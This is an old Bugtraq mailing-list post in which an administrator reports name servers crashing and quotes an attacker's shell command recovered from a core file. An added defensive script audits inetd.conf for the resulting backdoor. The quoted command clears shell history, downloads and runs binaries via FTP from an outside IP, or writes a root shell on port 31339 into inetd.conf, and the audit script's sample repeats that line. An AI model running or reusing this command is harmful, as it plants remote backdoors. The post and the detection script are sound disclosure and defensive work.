[7018] in bugtraq


Yipes named attack

daemon@ATHENA.MIT.EDU (Anonymous)
Wed Jun 24 17:39:53 1998

Date: 	Wed, 24 Jun 1998 16:20:01 -0400
Reply-To: Anonymous <nobody@ANON.MYOFB.ORG>
From: Anonymous <nobody@ANON.MYOFB.ORG>
To: BUGTRAQ@NETSPACE.ORG

All my name servers cored

connections looked like this

localhost.36486      localhost.32773      32768      0  8192      0 ESTABLISHED
localhost.32773      localhost.36486       8192      0 32768      0 ESTABLISHED
localhost.36489      localhost.32773      32768      0  8192      0 ESTABLISHED
localhost.32773      localhost.36489       8192      0 32768      0 ESTABLISHED
localhost.36492      localhost.36484      32768      0  8192      0 ESTABLISHED
localhost.36484      localhost.36492       8192      0 32768      0 ESTABLISHED
localhost.36495      localhost.36494      32768      0  8192      0 ESTABLISHED
localhost.36494      localhost.36495       8192      0 32768      0 ESTABLISHED
localhost.36498      localhost.36484      32768      0  8192      0 ESTABLISHED
localhost.36484      localhost.36498       8192      0 32768      0 ESTABLISHED
localhost.36501      localhost.36500      32768      0  8192      0 ESTABLISHED
localhost.36500      localhost.36501       8192      0 32768      0 ESTABLISHED
localhost.36516      localhost.36484      32768      0  8192      0 ESTABLISHED
localhost.36484      localhost.36516       8192      0 32768      0 ESTABLISHED
localhost.36519      localhost.36518      32768      0  8192      0 ESTABLISHED
localhost.36518      localhost.36519       8192      0 32768      0 ESTABLISHED
>
this is in the core file

>/bin/bash
>export HISTFILE=;if [ ! -x /sbin/inetd ];then cd /sbin;ping -c 1 208.21.174.3;ec
>ho -e 'open 208.21.174.3\nuser ftp h@e.y\nbin\nget i\nget d\nbye'|ftp -vin;if [
>-f i ];then chmod a+rx i d;mv i inetd;./d;else echo '31339 stream tcp nowait roo
>t /bin/bash sh -i'>/etc/inetd.conf;fi;fie


Sun tells me to apply the latest patch
but 7 phone calls later can't tell me if
the patch addresses this hack.

=;{>
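
An added example, not part of the original post: a shell function that audits an inetd.conf for entries shaped like the one the command in the core file writes (a shell as the server program, a bare port number as the service name). The function name `audit_inetd_conf`, the assumed field layout and the sample file are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): flag inetd.conf entries shaped
# like the one in the core file. Assumed field layout:
#   service  socket-type  proto  wait-status  user  server-program  args...

audit_inetd_conf() {
    awk '
        /^[ \t]*#/ || /^[ \t]*$/ { next }    # skip comments and blank lines
        {
            active++
            n = split($6, path, "/")         # basename of the server program
            why = ""
            if (path[n] ~ /^(sh|bash|csh|tcsh|ksh|zsh)$/) why = why " shell-as-server"
            if ($1 ~ /^[0-9]+$/)                           why = why " numeric-service"
            if (why != "") { hits++; printf "SUSPECT line %d:%s: %s\n", NR, why, $0 }
        }
        END {
            # The command in the core file replaces the file with ">", leaving one entry.
            if (active == 1) print "NOTE single active entry, file may have been overwritten"
            exit (hits > 0 ? 1 : 0)          # non-zero status when anything was flagged
        }
    ' "${1:-/etc/inetd.conf}"
}

# Constructed sample: two ordinary entries, then the entry quoted in the post.
sample=$(mktemp)
cat > "$sample" <<'EOF'
# constructed sample inetd.conf
ftp     stream  tcp  nowait  root  /usr/sbin/in.ftpd     in.ftpd
telnet  stream  tcp  nowait  root  /usr/sbin/in.telnetd  in.telnetd
31339 stream tcp nowait root /bin/bash sh -i
EOF
audit_inetd_conf "$sample" || echo "exit status 1: review the lines above"
rm -f "$sample"
```

Called with no argument the function reads /etc/inetd.conf; the non-zero exit status makes it usable from a scheduled integrity check.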
